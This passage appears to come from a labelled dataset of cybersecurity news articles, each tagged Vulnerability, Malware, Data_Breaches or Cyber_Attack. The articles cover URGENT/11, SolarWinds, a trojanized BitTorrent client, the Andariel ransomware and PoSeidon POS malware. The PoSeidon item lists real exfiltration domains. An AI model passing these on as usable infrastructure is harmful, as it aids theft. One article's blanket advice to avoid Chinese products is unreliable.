Takeaway: Since Apple already patched the majority of vulnerabilities exploited by the uncovered iPhone exploits, users are always recommended to keep their devices up-to-date to avoid becoming victims of such attack chains.
Update: Apple Accuses Google of Spreading Misinformation
Apple released a bold statement regarding the ""indiscriminate"" iPhone hacking campaign that Google's Project Zero researchers disclosed earlier this week, accusing Google of creating the false impression of ""mass exploitation.""
Apple confirmed that the attack, but said it affected fewer than a dozen websites that focus on content related to the Uighur community, and also clarifies the watering hole sites attacks were only operational for a brief period, roughly two months, not ""two years"" as Google implies.
In response to Apple's latest statement, Google spokesperson also released and shared a statement with The Hacker News, saying:
""Project Zero posts technical research that is designed to advance the understanding of security vulnerabilities, which leads to better defensive strategies. We stand by our in-depth research which was written to focus on the technical aspects of these vulnerabilities. We will continue to work with Apple and other leading companies to help keep people safe online.""
",Vulnerability
Critical Flaws Found in VxWorks RTOS That Powers Over 2 Billion Devices,https://thehackernews.com/2019/07/vxworks-rtos-vulnerability.html,"Security researchers have discovered almost a dozen zero-day vulnerabilities in VxWorks, one of the most widely used real-time operating systems (RTOS) for embedded devices that powers over 2 billion devices across aerospace, defense, industrial, medical, automotive, consumer electronics, networking, and other critical industries.
According to a new report Armis researchers shared with The Hacker News prior to its release, the vulnerabilities are collectively dubbed as URGENT/11 as they are 11 in total, 6 of which are critical in severity leading to 'devastating' cyberattacks.
Armis Labs is the same IoT security company that previously discovered the BlueBorne vulnerabilities in Bluetooth protocol that impacted more than 5.3 Billion devices—from Android, iOS, Windows and Linux to the Internet of things (IoT).
These vulnerabilities could allow remote attackers to bypass traditional security solutions and take full control over affected devices or ""cause disruption on a scale similar to what resulted from the EternalBlue vulnerability,"" without requiring any user interaction, researchers told The Hacker News.
It's likely possible that many of you might have never heard of this operating system, but Wind River VxWorks is being used to run many everyday internet-of-things such as your webcam, network switches, routers, firewalls, VOIP phones, printers, and video-conferencing products, as well as traffic lights.
Besides this, VxWorks is also being used by mission-critical systems including SCADA, trains, elevators and industrial controllers, patient monitors, MRI machines, satellite modems, in-flight WiFi systems, and even the mars rovers.
URGENT/11 — Vulnerabilities in VxWorks RTOS
The reported URGENT/11 vulnerabilities reside in the IPnet TCP/IP networking stack of the RTOS that was included in VxWorks since its version 6.5, apparently leaving all versions of VxWorks released in the last 13 years vulnerable to device takeover attacks.
All 6 critical vulnerabilities let attackers trigger remote code execution (RCE) attacks, and remaining flaws could lead to denial-of-service, information leaks, or logical flaws.
Critical Remote Code Execution Flaws:
Stack overflow in the parsing of IPv4 options (CVE-2019-12256)
Four memory corruption vulnerabilities stemming from erroneous handling of TCP's Urgent Pointer field (CVE-2019-12255, CVE-2019-12260, CVE-2019-12261, CVE-2019-12263)
Heap overflow in DHCP Offer/ACK parsing in ipdhcpc (CVE-2019-12257)
DoS, Information Leak, and Logical Flaws:
TCP connection DoS via malformed TCP options (CVE-2019-12258)
Handling of unsolicited Reverse ARP replies (Logical Flaw) (CVE-2019-12262)
Logical flaw in IPv4 assignment by the ipdhcpc DHCP client (CVE-2019-12264)
DoS via NULL dereference in IGMP parsing (CVE-2019-12259)
IGMP Information leak via IGMPv3 specific membership report (CVE-2019-12265)
All these flaws can be exploited by an unauthenticated, remote attacker just by sending a specially crafted TCP packet to an affected device without requiring any user interaction or prior information regarding the targeted device.
However, each version of VxWorks since 6.5 is not vulnerable to all 11 flaws, but at least one critical RCE flaw affects each version of the real-time operating system.
""VxWorks includes some optional mitigations that could make some of the URGENT/11 vulnerabilities harder to exploit, but these mitigations are rarely used by device manufacturers,"" the researchers say.
Armis researchers believe URGENT/11 flaws might affect devices using other real-time operating systems as well, as IPnet was used in other operating systems prior to its acquisition by VxWorks in 2006.
How Can Remote Attackers Exploit VxWorks Flaws?
The exploitation of VxWorks IPnet vulnerabilities also depends upon the location of an attacker and the targeted vulnerable device; after all, the attacker's network packets should reach the vulnerable system.
According to the researchers, the threat surface of URGENT/11 flaws can be divided into 3 attack scenarios, as explained below:
Scenario 1: Attacking the Network's Defenses
Since VxWorks also powers networking and security devices such as switches, routers, and firewalls that are usually reachable over the public Internet, a remote attacker can launch a direct attack against such devices, taking complete control over them, and subsequently, over the networks behind them.
For example, there are over 775,000 SonicWall firewalls connected to the Internet at the time of writing that runs VxWorks RTOS, according to Shodan search engine.
Scenario 2: Attacking from Outside the Network Bypassing Security
Besides targeting Internet-connected devices, an attacker can also attempt to target IoT devices that are not directly connected to the Internet but communicates with its cloud-based application protected behind a firewall or NAT solution.
According to the researchers, a potential attacker can use DNS changing malware or man-in-the-middle attacks to intercept a targeted device' TCP connection to the cloud and launch a remote code execution attack on it.
Scenario 3: Attacking from within the Network
In this scenario, an attacker who already has positioned himself within the network as a result of a prior attack can launch attacks against affected VxWorks powered devices simultaneously even when they have no direct connection to the Internet.
""The vulnerabilities in these unmanaged and IoT devices can be leveraged to manipulate data, disrupt physical world equipment, and put people's lives at risk,"" said Yevgeny Dibrov, CEO and co-founder of Armis.
""A compromised industrial controller could shut down a factory, and a pwned patient monitor could have a life-threatening effect.""
""To the best of both companies knowledge, there is no indication the URGENT/11 vulnerabilities have been exploited.""
However, researchers also confirmed that these vulnerabilities do not impact other variants of VxWorks designed for certification, such as VxWorks 653 and VxWorks Cert Edition.
Armis reported these vulnerabilities to Wind River Systems responsibly, and the company has already notified several device manufacturers and released patches to address the vulnerabilities last month.
Meanwhile, affected product vendors are also in the process of releasing patches for their customers, which researchers believe will take time and be difficult, as is usually the case when it comes to IoT and critical infrastructure updates. SonicWall and Xerox have already released patches for its firewall devices and printers, respectively.
",Vulnerability
Microsoft Says SolarWinds Hackers Accessed Some of Its Source Code,https://thehackernews.com/2020/12/microsoft-says-solarwinds-hackers.html,"Microsoft on Thursday revealed that the threat actors behind the SolarWinds supply chain attack were able to gain access to a small number of internal accounts and escalate access inside its internal network.
The ""very sophisticated nation-state actor"" used the unauthorized access to view, but not modify, the source code present in its repositories, the company said.
""We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories,"" the Windows maker disclosed in an update.
""The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated.""
The development is the latest in the far-reaching espionage saga that came to light earlier in December following revelations by cybersecurity firm FireEye that attackers had compromised its systems via a trojanized SolarWinds update to steal its Red Team penetration testing tools.
During the course of the probe into the hack, Microsoft had previously admitted to detecting malicious SolarWinds binaries in its own environment but denied its systems were used to target others or that attackers had access to production services or customer data.
Several other companies, including Cisco, VMware, Intel, NVIDIA, and a number of other US government agencies, have since discovered markers of the Sunburst (or Solorigate) malware on their networks, planted via tainted Orion updates.
The Redmond-based company said its investigation is still ongoing but downplayed the incident, adding ""viewing source code isn't tied to elevation of risk"" and that it had found evidence of attempted activities that were neutralized by its protections.
In a separate analysis published by Microsoft on December 28, the company called the attack a ""cross-domain compromise"" that allowed the adversary to introduce malicious code into signed SolarWinds Orion Platform binaries and leverage this widespread foothold to continue operating undetected and access the target's cloud resources, culminating in the exfiltration of sensitive data.
SolarWinds' Orion software, however, wasn't the only initial infection vector, as the US Cybersecurity and Infrastructure Security Agency (CISA) said the attackers used other methods as well, which have not yet been publicly disclosed.
The agency also released supplemental guidance urging all US federal agencies that still run SolarWinds Orion software to update to the latest 2020.2.1 HF2 version.
""The National Security Agency (NSA) has examined this version and verified that it eliminates the previously identified malicious code,"" the agency said.
",Malware
"Trojanized BitTorrent Software Update Hijacked 400,000 PCs Last Week",https://thehackernews.com/2018/03/windows-malware-hacking.html,"A massive malware outbreak that last week infected nearly half a million computers with cryptocurrency mining malware in just a few hours was caused by a backdoored version of popular BitTorrent client called MediaGet.
Dubbed Dofoil (also known as Smoke Loader), the malware was found dropping a cryptocurrency miner program as payload on infected Windows computers that mine Electroneum digital coins for attackers using victims' CPU cycles.
Dofoil campaign that hit PCs in Russia, Turkey, and Ukraine on 6th March was discovered by Microsoft Windows Defender research department and blocked the attack before it could have done any severe damages.
At the time when Windows Defender researchers detected this attack, they did not mention how the malware was delivered to such a massive audience in just 12 hours.
However, after investigation Microsoft today revealed that the attackers targeted the update mechanism of MediaGet BitTorrent software to push its trojanized version (mediaget.exe) to users' computers.
""A signed mediaget.exe downloads an update.exe program and runs it on the machine to install a new mediaget.exe. The new mediaget.exe program has the same functionality as the original but with additional backdoor capability,"" the researchers explain in a blog post published today.
Researchers believe MediaGet that signed update.exe is likely to be a victim of the supply chain attack, similar to CCleaner hack that infected over 2.3 million users with the backdoored version of the software in September 2017.
Also, in this case, the attackers signed the poisoned update.exe with a different certificate and successfully passed the validation required by the legitimate MediaGet.
""The dropped update.exe is a packaged InnoSetup SFX which has an embedded trojanized mediaget.exe, update.exe. When run, it drops a trojanized unsigned version of mediaget.exe.""
Once updated, the malicious BitTorrent software with additional backdoor functionality randomly connects to one (out of four) of its command-and-control (C&C) servers hosted on decentralized Namecoin network infrastructure and listens for new commands.
It then immediately downloads CoinMiner component from its C&C server, and start using victims' computers mine cryptocurrencies for the attackers.
Using C&C servers, attackers can also command infected systems to download and install additional malware from a remote URL.
The researchers found that the trojanized BitTorrent client, detected by Windows Defender AV as Trojan:Win32/Modimer.A, has 98% similarity to the original MediaGet binary.
Microsoft says behavior monitoring and AI-based machine learning techniques used by its Windows Defender Antivirus software have played an important role to detect and block this massive malware campaign.
",Malware
Malicious Olympic 2012 Android Apps & Domains,https://thehackernews.com/2012/08/malicious-olympic-2012-android-apps.html,"Whenever an important event takes place, new opportunities for cyber criminals, especially for those who develop attacks based on social engineering, arise. Currently, the whole world has its eyes glued to TV screens watching the London 2012 Olympic Games.
Anti-malware and anti-virus solutions provider Webroot has issued a warning that an app app called ""London Olympics Widget,"" which is described as an app that displays aggregated Olympic news coverage. In fact, it's really just harvesting the user's contact list and device ID while reading up on SMS messages too.
The package name is 'com.games.London.Olympics.widget'. This app has a digital certificate claiming it was developed in New Delhi, India.
For this scam, cybercriminals create websites that are very appealing; some even look very professional that they make it seem that you are close to having access to live programming. Researchers explain that the crooks rely on black hat SEO techniques to make sure that their malicious websites show up among the first in search engine results.
The security firm has determined that close to 10,000 clicks have already been redirected to the fraudulent Olympics website.Overall, a number of 38,000 clicks have been redirected to such sites, the victims being spread out across 100 countries.
Webroot advises that consumers should take a close look at the author of the app and then search the name to see if it is in fact a reputable company and/or developer, as seen in the photo above. A way that consumers can protect themselves from becoming a victim of these types of online scams is by learning about social engineering so they can recognize it and avoid falling into these traps.
The official London 2012 mobile app can be downloaded from the site.
",Malware
Malware Attack on South Korean Entities Was Work of Andariel Group,https://thehackernews.com/2021/06/malware-attack-on-south-korean-entities.html,"A malware campaign targeting South Korean entities that came to light earlier this year has been attributed to a North Korean nation-state hacking group called Andariel, once again indicating that Lazarus attackers are following the trends and their arsenal is in constant development.
""The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity,"" Russian cybersecurity firm Kaspersky said in a deep-dive published Tuesday. Victims of the attack are in the manufacturing, home network service, media, and construction sectors.
Designated as part of the Lazarus constellation, Andariel is known for unleashing attacks on South Korean organizations and businesses using specifically tailored methods created for maximum effectivity. In September 2019, the sub-group, along with Lazarus and Bluenoroff, was sanctioned by the U.S. Treasury Department for their malicious cyber activity on critical infrastructure.
Andariel is believed to have been active since at least May 2016.
North Korea has been behind an increasingly orchestrated effort aimed at infiltrating computers of financial institutions in South Korea and around the world as well as staging cryptocurrency heists to fund the cash-strapped country in an attempt to circumvent the stranglehold of economic sanctions imposed to stop the development of its nuclear weapons program.
The findings from Kaspersky build upon a previous report from Malwarebytes in April 2021, which documented a novel infection chain that distributed phishing emails weaponized with a macro embedded in a Word file that's executed upon opening in order to deploy malicious code concealed in the form of a bitmap (.BMP) image file to drop a remote access trojan (RAT) on targeted systems.
According to the latest analysis, the threat actor, besides installing a backdoor, is also said to have delivered file-encrypting ransomware to one of its victims, implying a financial motive to the attacks. It's worth noting that Andariel has a track record of attempting to steal bank card information by hacking into ATMs to withdraw cash or sell customer information on the black market.
""This ransomware sample is custom made and specifically developed by the threat actor behind this attack,"" Kaspersky Senior Security Researcher Seongsu Park said. ""This ransomware is controlled by command line parameters and can either retrieve an encryption key from the C2 [server] or, alternatively, as an argument at launch time.""
The ransomware is designed to encrypt all files in the machine with the exception of system-critical "".exe,"" "".dll,"" "".sys,"" "".msiins,"" and "".drv"" extensions in return for paying a bitcoin ransom to gain access to a decrypt tool and unique key to unlock the scrambled files.
Kaspersky's attribution to Andariel stems from overlaps in the XOR-based decryption routine that have been incorporated into the group's tactics as early as 2018 and in the post-exploitation commands executed on victim machines.
""The Andariel group has continued to focus on targets in South Korea, but their tools and techniques have evolved considerably,"" Park said. ""The Andariel group intended to spread ransomware through this attack and, by doing so, they have underlined their place as a financially motivated state-sponsored actor.""
",Malware
Chinese Android Smartphone comes with Pre-installed Spyware,https://thehackernews.com/2014/06/chinese-android-smartphone-comes-with.html,"If US has banned its several major government departments, including NASA, Justice and Commerce Departments, from purchasing Chinese products and computer technology due to suspected backdoors, then they are not wrong at all.
A popular Chinese Android Smartphone comes pre-installed with a Trojan that could allow manufacturer to spy onto their users' comprising their personal data and conversations without any restrictions and users knowledge.
GOOGLE PLAY STORE OR A SPYING APP?
According to the researchers at the German security firm G Data, the Star N9500 smartphone, a popular and cheap handset device in China, comes pre-installed with Uupay.D Trojan horse, disguising as a version of the Google Play Store.
The trojan camouflage as the Google Play Store, so it enables Chinese Company to secretly install malicious apps, which creates the whole spectrum of abuse.
STEALING WITHOUT RESTRICTIONS
The nasty Spyware runs in the background and has capability to steal personal information, copy users' data, record calls automatically with unlimited time and send costly SMS to premium services, thereby sending all the stolen information to an anonymous server based in China.
The malware is also capable to activate the microphone on users' smartphone at any time in order to turn users' smartphone into a bugging device that allows hackers to hear anything you are saying near by the phone.
""The spy function is invisible to the user and cannot be deactivated,"" reads the blog post published yesterday. ""This means that online criminals have full access to the smartphone and all personal data. Logs that could make an access visible to the users are deleted directly.""
REMOVAL OF THE TROJAN NOT POSSIBLE
In addition, the malicious software allow preventing security updates from being downloaded and one can not disable the program. ""The program also blocks the installation of security updates,"" claimed G Data.
Moreover, it is not possible to uninstall the trojan because it is embedded in the firmware of the Star-phone device.
""Unfortunately, removing the Trojan is not possible as it is part of the device's firmware and apps that fall into this category cannot be deleted,"" said Christian Geschkat, Product Manager at G Data. ""This includes the fake Google Play Store app of the N9500.""
CHEAP PRICE ATTRACTS USERS
The Star N9500 is an affordable copy of the Samsung Galaxy S4, which can be easily found at various online retailers such as eBay and Amazon for 130 to 165 euros and is also equipped with a variety of accessories, such as a second battery, car charger adapter and a second cover.
But considering the high technological standard of device, the low price comes as a surprise and the security researchers at G DATA believe that it is the cheap price of the mobile device that has made possible by the subsequent selling of data records stolen from the smartphone owner.
HOW TO CHECK IF YOU'RE AFFECTED
We recommend you to download an up-to-date Mobile Anti-virus software and scan your device for the trojan and if found return the device back from where you purchased.
Avoid buying Chinese and cheap products in order to keep your privacy and personal information away from the hands of cyber criminals and prying eyes.
",Malware
"TripAdvisor travel website infected with Gamarue malware, infect 2% Indian Internet Users",https://thehackernews.com/2012/11/tripadvisor-travel-website-infected.html,"TripAdvisor Inc., a hotel-review website, recently became a victim of the bug, said Trend Micro Inc., an Internet security solutions provider. Many of TripAdvisor's users received spam mail with booking confirmations for hotels they had checked out on the website, 1.89% of Indian Internet Users have already been affected.
The email purporting to be in the name of one of the Hotels has a similar theme to its English counterpart as it contains confirmation and details on an alleged booking reservation. TripAdvisor, which is among India's top five travel brands as per digital market research firm ComScore Inc., globally has 60 million unique monthly visitors and 2.4 million unique users per month in India.
Gamarue is a family of malware that may be distributed by exploit kits, spammed emails or other malware, and has been observed stealing information from an affected user.
Trend Micro reported that one of their manager received the spam at his personal e-mail address but the address mentioned in the mail was false as the actual hotel does not even exist in India. This made it clear that it was spam mail and nothing more than that.
""A lot of e-commerce websites pay the price of being popular. Online travel and hotel market has become an attractive target for cybercriminals given the large volume of transactions on hotel and online sites. A frequent traveler who has done a hotel booking or checked reviews recently, in all probability, would be prompted to click that mail. When a user clicks the attachment in this spam mail, the malware known as Gamarue becomes active. It can steal from an affected user any information left behind on the emails and saved on user's system"", said Suchita Vishnoi, Head Corporate Communications, Trend Micro.
The online travel and hotel market has become an attractive target for cyber criminals given the large volume of transactions on hotel and airline sites. One should be very smart and cautious while replying to their mails and should always confirm their source. It is a very easy trick, yet effective.
",Malware
Patched WinRAR Bug Still Under Active Attack—Thanks to No Auto-Updates,https://thehackernews.com/2019/03/winrar-hacking-malware.html,"Various cyber criminal groups and individual hackers are still exploiting a recently patched critical code execution vulnerability in WinRAR, a popular Windows file compression application with 500 million users worldwide.
Why? Because the WinRAR software doesn't have an auto-update feature, which, unfortunately, leaves millions of its users vulnerable to cyber attacks.
The critical vulnerability (CVE-2018-20250) that was patched late last month by the WinRAR team with the release of WinRAR version 5.70 beta 1 impacts all prior versions of WinRAR released over the past 19 years.
For those unaware, the vulnerability is ""Absolute Path Traversal"" bug that resides in the old third-party library UNACEV2.DLL of WinRAR and allows attackers to extract a compressed executable file from the ACE archive to one of the Windows Startup folders, where the malicious file would automatically run on the next reboot.
Therefore, to successfully exploit this vulnerability and take full control over the targeted computers, all an attacker needs to do is just convincing users into opening a maliciously-crafted compressed archive file using WinRAR.
Immediately after the details and proof-of-concept (PoC) exploit code went public, malicious attackers started exploiting the vulnerability in a malspam email campaign to install malware on users' computers running the vulnerable version of the software.
Now, security researchers from McAfee reported that they identified more than ""100 unique exploits and counting"" in the first week since the vulnerability was publicly disclosed, with most of the initial targets residing in the United States.
One recent campaign spotted by the researchers piggybacks on a bootlegged copy of an Ariana Grande's hit album, which is currently being detected as malware by only 11 security products, whereas 53 antivirus products fail to alert their users at the time of writing.
The malicious RAR file (Ariana_Grande-thank_u,_next(2019)_[320].rar) detected by McAfee extracts a list of harmless MP3 files to the victim's download folder but also drops a malicious EXE file to the startup folder, which has been designed to infect the targeted computer with malware.
""When a vulnerable version of WinRAR is used to extract the contents of this archive, a malicious payload is created in the Startup folder behind the scenes,"" the researchers explain.
""User Access Control (UAC) is bypassed, so no alert is displayed to the user. The next time the system restarts, the malware is run.""
Unfortunately, such campaigns are still ongoing, and the best way to protect yourself from such attacks is to update your system by installing the latest version of the WinRAR software as soon as possible and avoid opening files received from unknown sources.
",Malware
British Airways Fined £183 Million Under GDPR Over 2018 Data Breach,https://thehackernews.com/2019/07/british-airways-breach-gdpr-fine.html,"Britain's Information Commissioner's Office (ICO) today hit British Airways with a record fine of £183 million for failing to protect the personal information of around half a million of its customers during last year's security breach.
British Airways, who describes itself as ""The World's Favorite Airline,"" disclosed a breach last year that exposed personal details and credit-card numbers of up to 380,000 customers and lasted for more than two weeks.
At the time, the company confirmed that customers who booked flights on its official website (ba.com) and British Airways mobile app between August 21 and September 5 had had their details stolen by attackers.
The cyberattack was later attributed to the infamous Magecart threat actor, one of the most notorious hacking groups specialized in stealing credit card details from poorly-secured websites, especially online eCommerce platforms.
Magecart hackers have been known for using digital credit card skimmer wherein they secretly insert a few lines of malicious code into the checkout page of a compromised website that captures payment details of customers and then sends it to a remote server.
Besides British Airways, Magecart groups have also been responsible for card breaches on sites belonging to high-profile companies like TicketMaster, Newegg, as well as sites belonging to other small online merchants.
In a statement released today, ICO said its extensive investigation found that a variety of information related to British Airways' customers was compromised by ""poor security arrangements"" at the company, including their names and addresses, log-ins, payment card data, and travel booking details.
""People's personal data is just that – personal. When an organization fails to protect it from loss, damage or theft, it is more than an inconvenience,"" Information Commissioner Elizabeth Denham said.
""That's why the law is clear – when you are entrusted with personal data, you must look after it. Those that don't will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.""
However, ICO also said that British Airways has cooperated with its investigation and has made improvements to the security arrangements since the last year data breach came to light.
Since the data breach happened after the EU's General Data Protection Regulation (GDPR) took effect on May 2018, the fine of £183.39 million has been imposed on British Airways, which is the equivalent of 1.5% of the company's worldwide turnover for its 2017 financial year but is still less than the possible maximum of 4%.
In response to the ICO announcement, British Airways, owned by IAG, said the company was ""surprised and disappointed"" by the ICO penalty.
""British Airways responded quickly to a criminal act to steal customers' data,"" said British Airways chairman and chief executive Alex Cruz.
""We have found no evidence of fraud/fraudulent activity on accounts linked to the theft. We apologize to our customers for any inconvenience this event caused.""
The company has 28 days to appeal the penalty.
Until now, the most significant penalty by the UK's data protection watchdog was £500,000, which was imposed on Facebook last year for allowing political consultancy firm Cambridge Analytica to gather and misuse data of 87 million users improperly.
The same penalty of £500,000 was also imposed on credit reporting agency Equifax last year for its 2017's massive data breach that exposed the personal and financial information of hundreds of millions of its customers.
Since both the incidents in Facebook and Equifax occurred before GDPR took effect, £500,000 was the maximum penalty ICO can impose under the UK's old Data Protection Act.
",Data_Breaches
iOS URL Scheme Could Let App-in-the-Middle Attackers Hijack Your Accounts,https://thehackernews.com/2019/07/ios-custom-url-scheme.html,"Security researchers have illustrated a new app-in-the-middle attack that could allow a malicious app installed on your iOS device to steal sensitive information from other apps by exploiting certain implementations of Custom URL Scheme.
By default on Apple's iOS operating system, every app runs inside a sandbox of its own, which prevent all apps installed on the same device from accessing each other's data.
However, Apple offers some methods that facilitate sending and receiving very limited data between applications.
One such mechanism is called URL Scheme, also known as Deep Linking, that allows developers to let users launch their apps through URLs, like facetime://, whatsapp://, fb-messenger://.
For example, when you click ""Sign in with Facebook"" within an e-commerce app, it directly launches the Facebook app installed on your device and automatically process the authentication.
In the background, that e-commerce app actually triggers the URL Scheme for the Facebook app (fb://) and passes some context information required to process your login.
Researchers at Trend Micro noticed that since Apple does not explicitly define which app can use what keywords for their Custom URL Scheme, multiple apps on an iOS device can use single URL Scheme—which eventually could trigger and pass sensitive data to a completely different app unexpectedly or maliciously.
""This vulnerability is particularly critical if the login process of app A is associated with app B,"" the researchers said.
To demonstrate this, researchers illustrated an attack scenario, as shown in the image above, using an example of a Chinese retailer app ""Suning"" and its implementation of ""Login with WeChat"" feature, explaining how it is susceptible to hacking.
In Short, when the Suning app users choose to access their e-commerce account using WeChat, it generates a login-request and sends it to the WeChat app installed on the same device using the iOS URL Scheme for the messaging app. WeChat app then requests a secret login token from its server and sends it back to the Suning app for authentication.
Researchers found that since Suning always uses the same login-request query to request the secret token and WeChat does not authenticate the source of the login request, the implementation is vulnerable to the app-in-the-middle attack via the iOS URL Scheme, eventually allowing attackers gain unauthorized access to users' accounts.
""With the legitimate WeChat URL Scheme, a fake-WeChat can be crafted, and Suning will query the fake one for Login-Token. If the Suning app sends the query, then the fake app can capture its Login-Request URL Scheme.
""WeChat recognizes it, but it will not authenticate the source of the Login-Request. Instead, it will directly respond with a Login-Token to the source of the request. Unfortunately, the source could be a malicious app that is abusing the Suning URL scheme.""
That means, a malicious app with the same Custom URL Scheme as a targeted application can trick other apps into sharing users' sensitive data with it or can perform unauthorized actions, potentially resulting in the loss of privacy, bill fraud, or exposure to pop-up ads.
""In our research, plenty of apps that our system audited were found taking advantage of this feature to show ads to victims. Potentially malicious apps would intentionally claim the URL Scheme associated with popular apps: wechat://, line://, fb://, fb-messenger://, etc. We identified some of these malicious apps,"" the researchers said.
Since the exploitability of this vulnerability totally depends upon the way a URL Scheme has been implemented, app developers and popular platforms are recommended to review their apps and validate fix for untrusted requests.
",Vulnerability
"Microsoft Patch Tuesday - 8 Security Updates, 4 critical vulnerabilities, including Internet Explorer zero-day",https://thehackernews.com/2013/10/October-Patch-Tuesday-Internet-Explorer-zero-day.html,"October is turning out to be a busy month for patches. This month also marks the 10-year anniversary of the Patch Tuesday program, which Microsoft started in October of 2003.
Scheduled for tomorrow, Microsoft has announced that they will release eight security updates including four critical, addressing vulnerabilities in Microsoft Windows, Internet Explorer (IE), Microsoft Office and its other products.
Bulletin 1 is almost certainly to a zero-day vulnerability CVE-2013-3893 that has been actively exploited by hackers in targeted attacks. Though Microsoft issued a temporary ""Fix it"" in September for the vulnerability,
Bulletins 2, 3 and 4 address vulnerabilities in a wide range of Microsoft products, including Windows XP, 7 and 8, and Windows Server 2003, 2008 and 2012.
Bulletins 5, 6 and 7 address vulnerabilities that could allow for remote code execution. Bulletin 8 addresses an information disclosure vulnerability in SIlverlight and is the least urgent of the eight patches.
Microsoft's pre-release notice provides more details of the affected software packages.
Adobe will also be releasing updates on Tuesday for Reader XI and Acrobat XI for Windows. Both are rated 2, which means it's a critical vulnerability, but not known to be in use.
",Vulnerability
13 Anonymous Members indicted and accused of participating in 'Operation Payback',https://thehackernews.com/2013/10/13-anonymous-members-indicted-and.html,"A U.S. Grand jury indicted and accused 13 members of the hacking group Anonymous for allegedly participating in the cyber attacks against a number of websites as an anti-copyright campaign called ""Operation Payback""
Hackers took down the sites by inflicting a denial of service, or DDoS, attack, including those belonging to the Recording Industry Association of America, Visa and MasterCard.
The attacks were in retaliation for the shutdown of ""The Pirate Bay,"" a Sweden-based file-sharing website used to illegally download copyrighted material.
The DDoS Campaign was later extended to Bank of America and credit card companies such as Visa and MasterCard after they refused to process payments for WikiLeaks.
According to the indictment, the suspects are charged with conspiracy to intentionally cause damage to protected computers. Suspects downloaded and used software known as Low Orbit Ion Cannon, or LOIC, to launch distributed denial-of-service attacks, that flooded web servers with traffic and rendered sites unavailable for legitimate users.
Those charged ranged in age from 21 to 65 and lived in 13 different U.S. States, named in the indictment were Dennis Owen Collins, Jeremy Leroy Heller, Chen Zhiwei, Joshua Phy, Ryan Russel Gubele, Robert Audubon Whitfield, Anthony Tadros, Geoffrey Kenneth Commander, Austen Stamm, Timothy Robert McLain, Wade Carl Williams and Thomas Bell.
The court papers say that the hackers conspired to coordinate DDoS attacks in Internet Chat Relay (IRC) channels. The group caused an estimated $5,000 in damages and affected at least 10 protected computers.
""We do not forgive. We do not forget. Expect us,""
",Cyber_Attack
"New ""PoSeidon"" Point of Sale Malware Spotted in the Wild",https://thehackernews.com/2015/03/poseidon-point-of-sale-malware.html,"A new and terribly awful breed of Point-of-Sale (POS) malware has been spotted in the wild by the security researchers at Cisco's Talos Security Intelligence & Research Group that the team says is more sophisticated and nasty than previously seen Point of Sale malware.
The Point-of-Sale malware, dubbed ""PoSeidon"", is designed in a way that it has the capabilities of both the infamous Zeus banking Trojan and BlackPOS malware which robbed Millions from US giant retailers, Target in 2013 and Home Depot in 2014.
PoSeidon malware scrapes memory from Point of Sale terminals to search for card number sequences of principal card issuers like Visa, MasterCard, AMEX and Discover, and goes on using the Luhn algorithm to verify that credit or debit card numbers are valid.
The malware then siphon the captured credit card data off to Russian (.ru) domains for harvesting and likely resale, the researchers say.
""PoSeidon is another in the growing number of malware targeting POS systems that demonstrate the sophisticated techniques and approaches of malware authors,"" researchers of Cisco's Security Solutions team wrote in a blog post.
""Attackers will continue to target POS systems and employ various obfuscation techniques in an attempt to avoid detection. As long as POS attacks continue to provide returns, attackers will continue to invest in innovation and development of new malware families.""
The components of PoSeidon are illustrated in the diagram above.
Poseidon Point of Sale malware comprises of a Loader binary that maintains persistence on the target machine in an attempt to survive reboots and user logouts. The Loader then receives other components from the command and control servers.
A subsequently downloaded binary FindStr installs a Keylogger component which scans the memory of the PoS device for credit card number sequences.
The identified numbers are verified using the Luhn algorithm and then encrypted and sent to one of the given exfiltration servers, majority of which belongs to Russian domains:
linturefa.com
xablopefgr.com
tabidzuwek.com
lacdileftre.ru
tabidzuwek.com
xablopefgr.com
lacdileftre.ru
weksrubaz.ru
linturefa.ru
mifastubiv.ru
xablopefgr.ru
tabidzuwek.ru
In past few years, a number of Point of Sale malware has been spotted in the United States, collecting users' credit card magnetic stripe data, and selling them in underground black markets.
Network administrators should remain vigilant and must adhere to industry best practices so that they can protect themselves against advancing Point of Sale malware threats, the researchers say.
",Malware
"Mysterious malware that re-installs itself infected over 45,000 Android Phones",https://thehackernews.com/2019/10/remove-xhelper-android-malware.html,"Over the past few months, hundreds of Android users have been complaining online of a new piece of mysterious malware that hides on the infected devices and can reportedly reinstall itself even after users delete it, or factory reset their devices.
Dubbed Xhelper, the malware has already infected more than 45,000 Android devices in just the last six months and is continuing to spread by infecting at least 2,400 devices on an average each month, according to the latest report published today by Symantec.
Here below, I have collected excerpts from some comments that affected users shared on the online forums while asking for how to remove the Xhelper Android malware:
""xhelper regularly reinstalls itself, almost every day!""
""the 'install apps from unknown sources' setting turns itself on.""
""I rebooted my phone and also wiped my phone yet the app xhelper came back.""
""Xhelper came pre-installed on the phone from China.""
""don't buy cheap brand phones.""
From Where Xhelper Android Malware Comes?
Though the Symantec researchers did not find the exact source from where the malicious app packed with the Xhelper malware comes in the first place, the security firm did suspect that a malicious system app pre-installed on Android devices from certain brands actually downloaded the malware.
""None of the samples we analysed were available on the Google Play Store, and while it is possible that the Xhelper malware is downloaded by users from unknown sources, we believe that may not be the only channel of distribution,"" Symantec researchers write in its report.
""From our telemetry, we have seen these apps installed more frequently on certain phone brands, which leads us to believe that the attackers may be focusing on specific brands.""
In a separate report published two months ago by Malwarebytes, researchers believed that the Xhelper malware is being spread by ""web redirects"" or ""other shady websites"" that prompt users to download apps from untrusted third-party sources.
How Does the Xhelper Malware Work?
Once installed, Xhelper doesn't provide a regular user interface; instead, it gets installed as an application component that doesn't show up on the device's application launcher in an attempt to remain hidden from the users.
In order to launch itself, Xhelper relies on some external events triggered by users, like connecting or disconnecting the infected device from a power supply, rebooting a device, or installing or uninstalling an app.
Once launched, the malware connects to its remote command-and-control server over an encrypted channel and downloads additional payloads such as droppers, clickers, and rootkits on the compromised Android devices.
""We believe the pool of malware stored on the C&C server to be vast and varied in functionality, giving the attacker multiple options, including data theft or even complete takeover of the device,"" the researchers say.
The researchers believe that the source code of Xhelper is still a work in progress, as some of its ""older variants included empty classes that were not implemented at the time, but the functionality is now fully enabled.""
The Xhelper malware has been seen targeting Android smartphone users primarily in India, the United States, and Russia.
